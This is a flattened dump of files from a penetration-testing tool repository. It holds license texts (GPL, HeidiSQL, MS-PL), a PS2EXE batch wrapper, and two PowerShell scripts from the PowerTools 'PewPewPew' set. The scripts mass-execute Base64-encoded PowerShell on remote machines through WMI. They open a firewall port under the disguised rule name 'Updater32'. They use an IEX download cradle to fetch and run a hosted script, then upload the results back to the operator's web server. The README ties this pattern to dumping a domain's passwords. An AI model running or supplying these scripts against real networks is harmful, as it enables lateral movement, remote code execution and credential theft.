prohibited by law if you do not accept this License. Therefore, by 184 | modifying or distributing the Program (or any work based on the 185 | Program), you indicate your acceptance of this License to do so, and 186 | all its terms and conditions for copying, distributing or modifying 187 | the Program or works based on it. 188 | 189 | 6. Each time you redistribute the Program (or any work based on the 190 | Program), the recipient automatically receives a license from the 191 | original licensor to copy, distribute or modify the Program subject to 192 | these terms and conditions. You may not impose any further 193 | restrictions on the recipients' exercise of the rights granted herein. 194 | You are not responsible for enforcing compliance by third parties to 195 | this License. 196 | 197 | 7. If, as a consequence of a court judgment or allegation of patent 198 | infringement or for any other reason (not limited to patent issues), 199 | conditions are imposed on you (whether by court order, agreement or 200 | otherwise) that contradict the conditions of this License, they do not 201 | excuse you from the conditions of this License. If you cannot 202 | distribute so as to satisfy simultaneously your obligations under this 203 | License and any other pertinent obligations, then as a consequence you 204 | may not distribute the Program at all. For example, if a patent 205 | license would not permit royalty-free redistribution of the Program by 206 | all those who receive copies directly or indirectly through you, then 207 | the only way you could satisfy both it and this License would be to 208 | refrain entirely from distribution of the Program. 209 | 210 | If any portion of this section is held invalid or unenforceable under 211 | any particular circumstance, the balance of the section is intended to 212 | apply and the section as a whole is intended to apply in other 213 | circumstances. 214 | 215 | It is not the purpose of this section to induce you to infringe any 216 | patents or other property right claims or to contest validity of any 217 | such claims; this section has the sole purpose of protecting the 218 | integrity of the free software distribution system, which is 219 | implemented by public license practices. Many people have made 220 | generous contributions to the wide range of software distributed 221 | through that system in reliance on consistent application of that 222 | system; it is up to the author/donor to decide if he or she is willing 223 | to distribute software through any other system and a licensee cannot 224 | impose that choice. 225 | 226 | This section is intended to make thoroughly clear what is believed to 227 | be a consequence of the rest of this License. 228 | 229 | 8. If the distribution and/or use of the Program is restricted in 230 | certain countries either by patents or by copyrighted interfaces, the 231 | original copyright holder who places the Program under this License 232 | may add an explicit geographical distribution limitation excluding 233 | those countries, so that distribution is permitted only in or among 234 | countries not thus excluded. In such case, this License incorporates 235 | the limitation as if written in the body of this License. 236 | 237 | 9. The Free Software Foundation may publish revised and/or new versions 238 | of the General Public License from time to time. Such new versions will 239 | be similar in spirit to the present version, but may differ in detail to 240 | address new problems or concerns. 241 | 242 | Each version is given a distinguishing version number. If the Program 243 | specifies a version number of this License which applies to it and "any 244 | later version", you have the option of following the terms and conditions 245 | either of that version or of any later version published by the Free 246 | Software Foundation. If the Program does not specify a version number of 247 | this License, you may choose any version ever published by the Free Software 248 | Foundation. 249 | 250 | 10. If you wish to incorporate parts of the Program into other free 251 | programs whose distribution conditions are different, write to the author 252 | to ask for permission. For software which is copyrighted by the Free 253 | Software Foundation, write to the Free Software Foundation; we sometimes 254 | make exceptions for this. Our decision will be guided by the two goals 255 | of preserving the free status of all derivatives of our free software and 256 | of promoting the sharing and reuse of software generally. 257 | 258 | NO WARRANTY 259 | 260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN 262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 268 | REPAIR OR CORRECTION. 269 | 270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 278 | POSSIBILITY OF SUCH DAMAGES. 279 | 280 | END OF TERMS AND CONDITIONS 281 | 282 | How to Apply These Terms to Your New Programs 283 | 284 | If you develop a new program, and you want it to be of the greatest 285 | possible use to the public, the best way to achieve this is to make it 286 | free software which everyone can redistribute and change under these terms. 287 | 288 | To do so, attach the following notices to the program. It is safest 289 | to attach them to the start of each source file to most effectively 290 | convey the exclusion of warranty; and each file should have at least 291 | the "copyright" line and a pointer to where the full notice is found. 292 | 293 | 294 | Copyright (C) 295 | 296 | This program is free software; you can redistribute it and/or modify 297 | it under the terms of the GNU General Public License as published by 298 | the Free Software Foundation; either version 2 of the License, or 299 | (at your option) any later version. 300 | 301 | This program is distributed in the hope that it will be useful, 302 | but WITHOUT ANY WARRANTY; without even the implied warranty of 303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 304 | GNU General Public License for more details. 305 | 306 | You should have received a copy of the GNU General Public License 307 | along with this program; if not, write to the Free Software 308 | Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 309 | 310 | 311 | Also add information on how to contact you by electronic and paper mail. 312 | 313 | If the program is interactive, make it output a short notice like this 314 | when it starts in an interactive mode: 315 | 316 | Gnomovision version 69, Copyright (C) year name of author 317 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 318 | This is free software, and you are welcome to redistribute it 319 | under certain conditions; type `show c' for details. 320 | 321 | The hypothetical commands `show w' and `show c' should show the appropriate 322 | parts of the General Public License. Of course, the commands you use may 323 | be called something other than `show w' and `show c'; they could even be 324 | mouse-clicks or menu items--whatever suits your program. 325 | 326 | You should also get your employer (if you work as a programmer) or your 327 | school, if any, to sign a "copyright disclaimer" for the program, if 328 | necessary. Here is a sample; alter the names: 329 | 330 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 331 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 332 | 333 | , 1 April 1989 334 | Ty Coon, President of Vice 335 | 336 | This General Public License does not permit incorporating your program into 337 | proprietary programs. If your program is a subroutine library, you may 338 | consider it more useful to permit linking proprietary applications with the 339 | library. If this is what you want to do, use the GNU Lesser General 340 | Public License instead of this License. 341 | -------------------------------------------------------------------------------- /net/Windows/HeidiSQL_9.1_Portable/heidisql.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/heidisql.exe -------------------------------------------------------------------------------- /net/Windows/HeidiSQL_9.1_Portable/libeay32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/libeay32.dll -------------------------------------------------------------------------------- /net/Windows/HeidiSQL_9.1_Portable/libintl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/libintl.dll -------------------------------------------------------------------------------- /net/Windows/HeidiSQL_9.1_Portable/libmysql.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/libmysql.dll -------------------------------------------------------------------------------- /net/Windows/HeidiSQL_9.1_Portable/libpq.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/libpq.dll -------------------------------------------------------------------------------- /net/Windows/HeidiSQL_9.1_Portable/license.txt: -------------------------------------------------------------------------------- 1 | Copyright (C)2000 - 2014 - Ansgar Becker 2 | 3 | HeidiSQL is free. You don't have to pay for it, and you can use it any 4 | way you want. It is developed as an Open Source project under the GNU 5 | General Public License (GPL). That means you have full access to the source 6 | code of this program. You can find it at GoogleCode here: 7 | http://code.google.com/p/heidisql/source/checkout 8 | 9 | The General Public License (GPL) is shipped with the installer-package and 10 | should be located in the same folder as this file (gpl.txt). 11 | 12 | If you simply wish to install and use this software, you need only be aware 13 | of the disclaimer conditions in the license, which are set out below. 14 | 15 | NO WARRANTY 16 | 17 | Because the program is licensed free of charge, there is no warranty for the 18 | program, to the extent permitted by applicable law. Except when otherwise 19 | stated in writing the copyright holders and/or other parties provide the 20 | program "as is" without warranty of any kind, either expressed or implied, 21 | including, but not limited to, the implied warranties of merchantability and 22 | fitness for a particular purpose. The entire risk as to the quality and 23 | performance of the program is with you. Should the program prove defective, 24 | you assume the cost of all necessary servicing, repair or correction. 25 | In no event unless required by applicable law or agreed to in writing will 26 | any copyright holder, or any other party who may modify and/or redistribute 27 | the program as permitted above, be liable to you for damages, including any 28 | general, special, incidental or consequential damages arising out of the use 29 | or inability to use the program (including but not limited to loss of data 30 | or data being rendered inaccurate or losses sustained by you or third 31 | parties or a failure of the program to operate with any other programs), 32 | even if such holder or other party has been advised of the possibility of 33 | such damages. 34 | -------------------------------------------------------------------------------- /net/Windows/HeidiSQL_9.1_Portable/plugins/dialog.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/plugins/dialog.dll -------------------------------------------------------------------------------- /net/Windows/HeidiSQL_9.1_Portable/portable_settings.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/portable_settings.txt -------------------------------------------------------------------------------- /net/Windows/HeidiSQL_9.1_Portable/ssleay32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/ssleay32.dll -------------------------------------------------------------------------------- /net/Windows/ImmunityDebugger_1_85_setup.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/ImmunityDebugger_1_85_setup.exe -------------------------------------------------------------------------------- /net/Windows/PS2EXE-v0.5.0.0/MS-PL.txt: -------------------------------------------------------------------------------- 1 | Microsoft Public License (Ms-PL) 2 | from http://www.microsoft.com/opensource/licenses.mspx#Ms-PL 3 | 4 | This license governs use of the accompanying software. If you use the software, you accept this license. If you do not accept the license, do not use the software. 5 | 6 | 7 | 1. Definitions 8 | 9 | The terms "reproduce," "reproduction," "derivative works," and "distribution" have the same meaning here as under U.S. copyright law. A "contribution" is the original software, or any additions or changes to the software. A "contributor" is any person that distributes its contribution under this license. "Licensed patents" are a contributor's patent claims that read directly on its contribution. 10 | 11 | 2. Grant of Rights 12 | 13 | (A) Copyright Grant- Subject to the terms of this license, including the license conditions and limitations in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free copyright license to reproduce its contribution, prepare derivative works of its contribution, and distribute its contribution or any derivative works that you create. 14 | (B) Patent Grant- Subject to the terms of this license, including the license conditions and limitations in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free license under its licensed patents to make, have made, use, sell, offer for sale, import, and/or otherwise dispose of its contribution in the software or derivative works of the contribution in the software. 15 | 16 | 3. Conditions and Limitations 17 | 18 | (A) No Trademark License- This license does not grant you rights to use any contributors' name, logo, or trademarks. 19 | (B) If you bring a patent claim against any contributor over patents that you claim are infringed by the software, your patent license from such contributor to the software ends automatically. 20 | (C) If you distribute any portion of the software, you must retain all copyright, patent, trademark, and attribution notices that are present in the software. 21 | (D) If you distribute any portion of the software in source code form, you may do so only under this license by including a complete copy of this license with your distribution. If you distribute any portion of the software in compiled or object code form, you may only do so under a license that complies with this license. 22 | (E) The software is licensed "as-is." You bear the risk of using it. The contributors give no express warranties, guarantees, or conditions. You may have additional consumer rights under your local laws which this license cannot change. To the extent permitted under your local laws, the contributors exclude the implied warranties of merchantability, fitness for a particular purpose and non-infringement. -------------------------------------------------------------------------------- /net/Windows/PS2EXE-v0.5.0.0/PSEXE.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PS2EXE-v0.5.0.0/PSEXE.ico -------------------------------------------------------------------------------- /net/Windows/PS2EXE-v0.5.0.0/callPS2EXE.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | set cmd= 3 | :Loop 4 | IF "%~1"=="" GOTO Continue 5 | 6 | set cmd=%cmd% '%1' 7 | 8 | SHIFT 9 | GOTO Loop 10 | :Continue 11 | 12 | rem echo %cmd% 13 | powershell.exe -command "&'.\ps2exe.ps1' %cmd%" 14 | 15 | -------------------------------------------------------------------------------- /net/Windows/PS2EXE-v0.5.0.0/createDemo.bat: -------------------------------------------------------------------------------- 1 | call "callPS2EXE.bat" "test.ps1" "test.exe" -iconFile PS2EXE.ico 2 | 3 | call "callPS2EXE.bat" "test.ps1" "test_x64.exe" -x64 4 | 5 | call "callPS2EXE.bat" "test.ps1" "test_x86.exe" -x86 6 | 7 | call "callPS2EXE.bat" "test.ps1" "test_20_STA.exe" -sta -runtime20 -iconFile PS2EXE.ico 8 | 9 | call "callPS2EXE.bat" "test.ps1" "test_30_MTA.exe" -mta -runtime30 10 | 11 | call "callPS2EXE.bat" "test.ps1" "test_30_NOCONSOLE.exe" -noconsole -runtime30 12 | 13 | call "callPS2EXE.bat" "test.ps1" "test_20_NOCONSOLE.exe" -noconsole -runtime20 14 | 15 | call "callPS2EXE.bat" "test.ps1" "test_40.exe" -runtime40 16 | -------------------------------------------------------------------------------- /net/Windows/PS2EXE-v0.5.0.0/ps2exe.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PS2EXE-v0.5.0.0/ps2exe.ps1 -------------------------------------------------------------------------------- /net/Windows/PS2EXE-v0.5.0.0/test.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PS2EXE-v0.5.0.0/test.ps1 -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/LICENSE: -------------------------------------------------------------------------------- 1 | PowerTools is provided under the 3-clause BSD license below. 2 | 3 | ************************************************************* 4 | 5 | Copyright (c) 2014, Will Schroeder 6 | All rights reserved. 7 | 8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 9 | 10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission. 13 | 14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 15 | 16 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PewPewPew/Invoke-MassCommand.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | Template to mass-run a specific command across 3 | multiple machines using WMI and retrieve the results 4 | using a local web server. 5 | 6 | by @harmj0y 7 | #> 8 | 9 | 10 | function Invoke-MassCommand { 11 | <# 12 | .SYNOPSIS 13 | Uses WMI and a local web server to mass-run a command 14 | across multiple machines. 15 | 16 | .PARAMETER Hosts 17 | Array of host names to run Invoke-MassCommand on. 18 | 19 | .PARAMETER HostList 20 | List of host names to run Invoke-MassCommand on. 21 | 22 | .PARAMETER Command 23 | PowerShell one-liner command to run. 24 | 25 | .PARAMETER LocalIpAddress 26 | Local IP address to use. Will try to determine if not specified. 27 | 28 | .PARAMETER LocalPort 29 | Local port to host the script on, defaults to 8080 30 | 31 | .PARAMETER ServerSleep 32 | Time to sleep the web server for output before shutting it down. 33 | Default to 30 seconds. 34 | 35 | .PARAMETER OutputFolder 36 | Folder to pipe host outputs to. 37 | 38 | .PARAMETER FireWallRule 39 | Add (and then remove) a firewall rule to allow access to the 40 | specified port. 41 | #> 42 | [cmdletbinding()] 43 | param( 44 | [Parameter(Position=0,ValueFromPipeline=$true)] 45 | [String[]] 46 | $Hosts, 47 | 48 | [String] 49 | $HostList, 50 | 51 | [String] 52 | $Command = "dir C:\", 53 | 54 | [String] 55 | $LocalIpAddress, 56 | 57 | [String] 58 | $LocalPort="8080", 59 | 60 | [Int] 61 | $ServerSleep=30, 62 | 63 | [String] 64 | $OutputFolder="CommandOutput", 65 | 66 | [Switch] 67 | $FireWallRule 68 | ) 69 | 70 | begin { 71 | 72 | # script block to invoke over remote machines. 73 | $WebserverScriptblock={ 74 | param($LocalPort, $OutputFolder) 75 | 76 | # webserver stub adapted from @obscuresec: 77 | # https://gist.github.com/obscuresec/71df69d828e6e05986e9#file-dirtywebserver-ps1 78 | $Hso = New-Object Net.HttpListener 79 | $Hso.Prefixes.Add("http://+:$LocalPort/") 80 | $Hso.Start() 81 | 82 | while ($Hso.IsListening) { 83 | $HC = $Hso.GetContext() 84 | $OriginatingIP = $HC.Request.UserHostAddress 85 | $HRes = $HC.Response 86 | $HRes.Headers.Add("Content-Type","text/plain") 87 | $Buf = [Text.Encoding]::UTF8.GetBytes("") 88 | 89 | # process any GET requests 90 | if( $HC.Request.RawUrl -eq "/"){ 91 | $Buf = [Text.Encoding]::UTF8.GetBytes("") 92 | } 93 | # process any POST results from the invoked script 94 | else { 95 | # extract the hostname from the URI request 96 | $hostname = $HC.Request.RawUrl.split("/")[-1] 97 | 98 | $output = "" 99 | $size = $HC.Request.ContentLength64 + 1 100 | 101 | $buffer = New-Object byte[] $size 102 | do { 103 | $count = $HC.Request.InputStream.Read($buffer, 0, $size) 104 | $output += $HC.Request.ContentEncoding.GetString($buffer, 0, $count) 105 | } until($count -lt $size) 106 | $HC.Request.InputStream.Close() 107 | 108 | if (($output) -and ($output.Length -ne 0)){ 109 | $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($output)) 110 | 111 | $OutFile = $OutputFolder + "\$($hostname).txt" 112 | 113 | $decoded | Out-File -Append -Encoding ASCII -FilePath $OutFile 114 | } 115 | } 116 | $HRes.ContentLength64 = $Buf.Length 117 | $HRes.OutputStream.Write($Buf,0,$Buf.Length) 118 | $HRes.Close() 119 | } 120 | } 121 | 122 | if($HostList){ 123 | if (Test-Path -Path $HostList){ 124 | $Hosts += Get-Content -Path $HostList 125 | } 126 | else { 127 | Write-Warning "[!] Input file '$HostList' doesn't exist!" 128 | } 129 | } 130 | 131 | # if the output file isn't a full path, append the current location to it 132 | if(-not ($OutputFolder.Contains("\"))){ 133 | $OutputFolder = (Get-Location).Path + "\" + $OutputFolder 134 | } 135 | 136 | # create the output folder if it doesn't exist 137 | New-Item -Force -ItemType directory -Path $OutputFolder | Out-Null 138 | 139 | # add a temporary firewall rule if specified 140 | if($FireWallRule){ 141 | Write-Verbose "Setting inbound firewall rule for port $LocalPort" 142 | $fw = New-Object -ComObject hnetcfg.fwpolicy2 143 | $rule = New-Object -ComObject HNetCfg.FWRule 144 | $rule.Name = "Updater32" 145 | $rule.Protocol = 6 146 | $rule.LocalPorts = $LocalPort 147 | $rule.Direction = 1 148 | $rule.Enabled=$true 149 | $rule.Grouping="@firewallapi.dll,-23255" 150 | $rule.Profiles = 7 151 | $rule.Action=1 152 | $rule.EdgeTraversal=$false 153 | $fw.Rules.Add($rule) 154 | } 155 | 156 | Start-Job -Name WebServer -Scriptblock $WebserverScriptblock -ArgumentList $LocalPort,$OutputFolder | Out-Null 157 | Write-Verbose "Sleeping, letting the web server stand up..." 158 | Start-Sleep -s 5 159 | } 160 | 161 | process { 162 | 163 | if(-not $LocalIpAddress){ 164 | $LocalIpAddress = (gwmi Win32_NetworkAdapterConfiguration | ? { $_.IPAddress -ne $null}).ipaddress[0] 165 | } 166 | 167 | $hosts | % { 168 | # the download/check back in command 169 | $LauncherCommand = "$Command | % {[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(`$_))} | % {(new-object net.webclient).UploadString('http://"+$LocalIpAddress+":$LocalPort/$_', `$_)}" 170 | $bytes = [Text.Encoding]::Unicode.GetBytes($LauncherCommand) 171 | $encodedCommand = [Convert]::ToBase64String($bytes) 172 | 173 | Write-Verbose "Executing command on host `"$_`"" 174 | Invoke-WmiMethod -ComputerName $_ -Path Win32_process -Name create -ArgumentList "powershell.exe -enc $encodedCommand" | out-null 175 | } 176 | } 177 | 178 | end { 179 | 180 | Write-Verbose "Waiting $ServerSleep seconds for commands to trigger..." 181 | Start-Sleep -s $ServerSleep 182 | 183 | # perform any post-processing on the output files... 184 | Get-ChildItem $OutputFolder -Filter *.txt | 185 | foreach-object { 186 | $server = $_.Name.split(".")[0] 187 | $rawtext = [Io.File]::ReadAllText($_.FullName) 188 | # ... 189 | } 190 | 191 | # remove the firewall rule if specified 192 | if($FireWallRule){ 193 | Write-Verbose "Removing inbound firewall rule" 194 | $fw.rules.Remove("Updater32") 195 | } 196 | 197 | Write-Verbose "Killing the web server" 198 | Get-Job -Name WebServer | Stop-Job 199 | } 200 | } 201 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PewPewPew/Invoke-MassTemplate.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | Template to mass-run a specific powershell script 3 | across multiple machines using a local web server 4 | and WMI execution. 5 | 6 | Replace "" with the script you 7 | want run. 8 | 9 | by @harmj0y 10 | #> 11 | 12 | 13 | function Invoke-MassTemplate { 14 | <# 15 | .SYNOPSIS 16 | ... 17 | 18 | .PARAMETER Hosts 19 | Array of host names to run Invoke-X on. 20 | 21 | .PARAMETER HostList 22 | List of host names to run Invoke-X on. 23 | 24 | .PARAMETER LocalIpAddress 25 | Local IP address to use. Will try to determine if not specified. 26 | 27 | .PARAMETER LocalPort 28 | Local port to host the script on, defaults to 8080 29 | 30 | .PARAMETER ServerSleep 31 | Time to sleep the web server for output before shutting it down. 32 | Default to 30 seconds. 33 | 34 | .PARAMETER OutputFolder 35 | Folder to pipe host outputs to. 36 | 37 | .PARAMETER FireWallRule 38 | Add (and then remove) a firewall rule to allow access to the 39 | specified port. 40 | #> 41 | [cmdletbinding()] 42 | param( 43 | [Parameter(Position=0,ValueFromPipeline=$true)] 44 | [String[]] 45 | $Hosts, 46 | 47 | [String] 48 | $HostList, 49 | 50 | [String] 51 | $LocalIpAddress, 52 | 53 | [String] 54 | $LocalPort="8080", 55 | 56 | [Int] 57 | $ServerSleep=30, 58 | 59 | [String] 60 | $OutputFolder="output", 61 | 62 | [Switch] 63 | $FireWallRule 64 | ) 65 | 66 | 67 | begin { 68 | 69 | # script block to invoke over remote machines. 70 | $WebserverScriptblock={ 71 | param($LocalPort, $OutputFolder) 72 | 73 | $HostedScript = 74 | @' 75 | 76 | 77 | 78 | '@ 79 | 80 | # webserver stub adapted from @obscuresec: 81 | # https://gist.github.com/obscuresec/71df69d828e6e05986e9#file-dirtywebserver-ps1 82 | $Hso = New-Object Net.HttpListener 83 | $Hso.Prefixes.Add("http://+:$LocalPort/") 84 | $Hso.Start() 85 | 86 | while ($Hso.IsListening) { 87 | $HC = $Hso.GetContext() 88 | $OriginatingIP = $HC.Request.UserHostAddress 89 | $HRes = $HC.Response 90 | $HRes.Headers.Add("Content-Type","text/plain") 91 | $Buf = [Text.Encoding]::UTF8.GetBytes("") 92 | 93 | # process any GET requests 94 | if( $HC.Request.RawUrl -eq "/update"){ 95 | $Buf = [Text.Encoding]::UTF8.GetBytes($HostedScript) 96 | } 97 | elseif( $HC.Request.RawUrl -eq "/"){ 98 | $Buf = [Text.Encoding]::UTF8.GetBytes("") 99 | } 100 | # process any POST results from the invoked script 101 | else { 102 | # extract the hostname from the URI request 103 | $hostname = $HC.Request.RawUrl.split("/")[-1] 104 | 105 | $output = "" 106 | $size = $HC.Request.ContentLength64 + 1 107 | 108 | $buffer = New-Object byte[] $size 109 | do { 110 | $count = $HC.Request.InputStream.Read($buffer, 0, $size) 111 | $output += $HC.Request.ContentEncoding.GetString($buffer, 0, $count) 112 | } until($count -lt $size) 113 | $HC.Request.InputStream.Close() 114 | 115 | if (($output) -and ($output.Length -ne 0)){ 116 | $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($output)) 117 | 118 | $OutFile = $OutputFolder + "\$($hostname).txt" 119 | 120 | $decoded | Out-File -Append -Encoding ASCII -FilePath $OutFile 121 | } 122 | } 123 | $HRes.ContentLength64 = $Buf.Length 124 | $HRes.OutputStream.Write($Buf,0,$Buf.Length) 125 | $HRes.Close() 126 | } 127 | } 128 | 129 | if($HostList){ 130 | if (Test-Path -Path $HostList){ 131 | $Hosts += Get-Content -Path $HostList 132 | } 133 | else { 134 | Write-Warning "[!] Input file '$HostList' doesn't exist!" 135 | } 136 | } 137 | 138 | # if the output file isn't a full path, append the current location to it 139 | if(-not ($OutputFolder.Contains("\"))){ 140 | $OutputFolder = (Get-Location).Path + "\" + $OutputFolder 141 | } 142 | 143 | # create the output folder if it doesn't exist 144 | New-Item -Force -ItemType directory -Path $OutputFolder | Out-Null 145 | 146 | # add a temporary firewall rule if specified 147 | if($FireWallRule){ 148 | Write-Verbose "Setting inbound firewall rule for port $LocalPort" 149 | $fw = New-Object -ComObject hnetcfg.fwpolicy2 150 | $rule = New-Object -ComObject HNetCfg.FWRule 151 | $rule.Name = "Updater32" 152 | $rule.Protocol = 6 153 | $rule.LocalPorts = $LocalPort 154 | $rule.Direction = 1 155 | $rule.Enabled=$true 156 | $rule.Grouping="@firewallapi.dll,-23255" 157 | $rule.Profiles = 7 158 | $rule.Action=1 159 | $rule.EdgeTraversal=$false 160 | $fw.Rules.Add($rule) 161 | } 162 | 163 | Start-Job -Name WebServer -Scriptblock $WebserverScriptblock -ArgumentList $LocalPort,$OutputFolder | Out-Null 164 | Write-Verbose "Sleeping, letting the web server stand up..." 165 | Start-Sleep -s 5 166 | } 167 | 168 | process { 169 | 170 | if(-not $LocalIpAddress){ 171 | $p = (gwmi Win32_NetworkAdapterConfiguration| Where{$_.IPAddress} | Select -Expand IPAddress); 172 | # check if the IP is a string or the [IPv4,IPv6] array 173 | $LocalIpAddress = @{$true=$p[0];$false=$p}[$p.Length -lt 6]; 174 | } 175 | 176 | $hosts | % { 177 | # the download/check back in command 178 | $command = "IEX (New-Object Net.Webclient).DownloadString('http://"+$LocalIpAddress+":$LocalPort/update') | % {[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(`$_))} | % {(new-object net.webclient).UploadString('http://"+$LocalIpAddress+":$LocalPort/$_', `$_)}" 179 | $bytes = [Text.Encoding]::Unicode.GetBytes($command) 180 | $encodedCommand = [Convert]::ToBase64String($bytes) 181 | 182 | Write-Verbose "Executing command on host `"$_`"" 183 | Invoke-WmiMethod -ComputerName $_ -Path Win32_process -Name create -ArgumentList "powershell.exe -enc $encodedCommand" | out-null 184 | } 185 | } 186 | 187 | end { 188 | 189 | Write-Verbose "Waiting $ServerSleep seconds for commands to trigger..." 190 | Start-Sleep -s $ServerSleep 191 | 192 | # perform any post-processing on the output files... 193 | Get-ChildItem $OutputFolder -Filter *.txt | 194 | foreach-object { 195 | $server = $_.Name.split(".")[0] 196 | $rawtext = [Io.File]::ReadAllText($_.FullName) 197 | # ... 198 | } 199 | 200 | # remove the firewall rule if specified 201 | if($FireWallRule){ 202 | Write-Verbose "Removing inbound firewall rule" 203 | $fw.rules.Remove("Updater32") 204 | } 205 | 206 | Write-Verbose "Killing the web server" 207 | Get-Job -Name WebServer | Stop-Job 208 | } 209 | } 210 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PewPewPew/README.md: -------------------------------------------------------------------------------- 1 | #PewPewPew 2 | 3 | This repo contains scripts that utilize a common pattern to host a script 4 | on a PowerShell webserver, invoke the IEX download cradle to 5 | download/execute the target code and post the results back to the server, 6 | and then post-process any results. 7 | 8 | More details [here](http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/) 9 | 10 | Developed by [@harmj0y](https://twitter.com/harmj0y) 11 | 12 | Part of Veil's 